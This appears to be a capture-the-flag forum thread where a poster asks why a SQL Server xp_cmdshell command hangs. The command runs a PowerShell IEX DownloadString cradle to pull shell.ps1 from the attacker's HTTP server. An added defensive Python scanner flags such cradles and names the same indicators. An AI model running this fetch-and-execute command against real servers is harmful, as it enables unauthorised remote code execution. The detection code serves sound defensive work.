Starting point Foothold

okay..

I'm listening on port 80

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.27 - - [01/Jul/2020 17:24:12] "GET /shell.ps1 HTTP/1.1" 200 -

My other terminal, in SQL, pulling the shell.ps1:

Press help for extra shell commands
SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.163/shell.ps1\");"

The problem is the SQL xp_cmdshell command is waiting forever.
Nothing returned.
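For a defender, the interesting artefact in this thread is the statement itself: an xp_cmdshell call that launches PowerShell with a DownloadString/IEX cradle pointing at a bare IP address. The following is an added example, not code from the original post: a small Python scanner over constructed SQL Server statement records (a simplified "timestamp | login | statement" layout assumed here for illustration, not a real audit format) that flags xp_cmdshell being enabled or invoked and raises the severity when the command carries a download cradle like the one above.

```python
import re
from dataclasses import dataclass

# Constructed sample records (not from the thread or any real server): a
# simplified "timestamp | login | statement" form of what a SQL Server audit
# or Extended Events session might capture for executed statements.
SAMPLE_RECORDS = [
    "2020-07-01T17:24:10Z | sa | SELECT name FROM sys.databases",
    "2020-07-01T17:24:11Z | sa | EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "2020-07-01T17:24:12Z | sa | xp_cmdshell \"powershell \"IEX (New-Object Net.WebClient)"
    ".DownloadString(\\\"http://10.10.14.163/shell.ps1\\\");\"",
    "2020-07-01T17:25:03Z | reporting_user | EXEC xp_cmdshell 'dir C:\\Reports'",
    "2020-07-01T17:26:00Z | app | UPDATE orders SET status = 'shipped' WHERE id = 42",
]


@dataclass
class Finding:
    timestamp: str
    login: str
    severity: str
    reasons: list


# Enabling xp_cmdshell is a separate event from invoking it; both are worth a look.
ENABLE_XP = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1", re.IGNORECASE)
XP_CMDSHELL = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)
SHELL_INTERPRETER = re.compile(r"powershell|cmd\.exe|cmd\s+/c", re.IGNORECASE)

# Download-cradle indicators, matched only inside an xp_cmdshell command.
DOWNLOAD_CRADLE = [
    (re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE), "in-memory execution (IEX)"),
    (re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bcurl\b|\bwget\b",
                re.IGNORECASE), "remote download"),
    (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.IGNORECASE),
     "URL with a bare IP address"),
]
HIGH_SEVERITY = {"remote download", "in-memory execution (IEX)"}


def parse_record(line):
    """Split one constructed record into (timestamp, login, statement)."""
    parts = [p.strip() for p in line.split("|", 2)]
    if len(parts) != 3:
        return None
    return tuple(parts)


def classify(statement):
    """Return (severity, reasons) for a suspicious statement, or None if benign."""
    reasons = []
    if ENABLE_XP.search(statement):
        reasons.append("xp_cmdshell enabled via sp_configure")
    elif XP_CMDSHELL.search(statement):
        reasons.append("xp_cmdshell invoked")
        if SHELL_INTERPRETER.search(statement):
            reasons.append("spawns a shell interpreter")
        for pattern, label in DOWNLOAD_CRADLE:
            if pattern.search(statement):
                reasons.append(label)
    if not reasons:
        return None
    severity = "high" if HIGH_SEVERITY.intersection(reasons) else "medium"
    return severity, reasons


def scan(records):
    """Run classify() over every record and collect the findings in order."""
    findings = []
    for line in records:
        parsed = parse_record(line)
        if parsed is None:
            continue
        timestamp, login, statement = parsed
        result = classify(statement)
        if result is not None:
            severity, reasons = result
            findings.append(Finding(timestamp, login, severity, reasons))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(f"{finding.timestamp} {finding.login:>15} {finding.severity:>6}: "
              + "; ".join(finding.reasons))
```

On the constructed records this yields three findings: the sp_configure change and the plain `dir` invocation at medium, and the PowerShell cradle at high. The cradle rule keys on the download and in-memory-execution verbs rather than on a specific script name, so a renamed `.ps1` is still caught; the bare-IP URL check is a supporting signal, not a requirement.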

Comments

  • I'm facing the same issue. Response is 200, netcat sees the connection from 10.10.10.27, but nothing is returned in the SQL prompt.

    Did you manage to find out anything new?
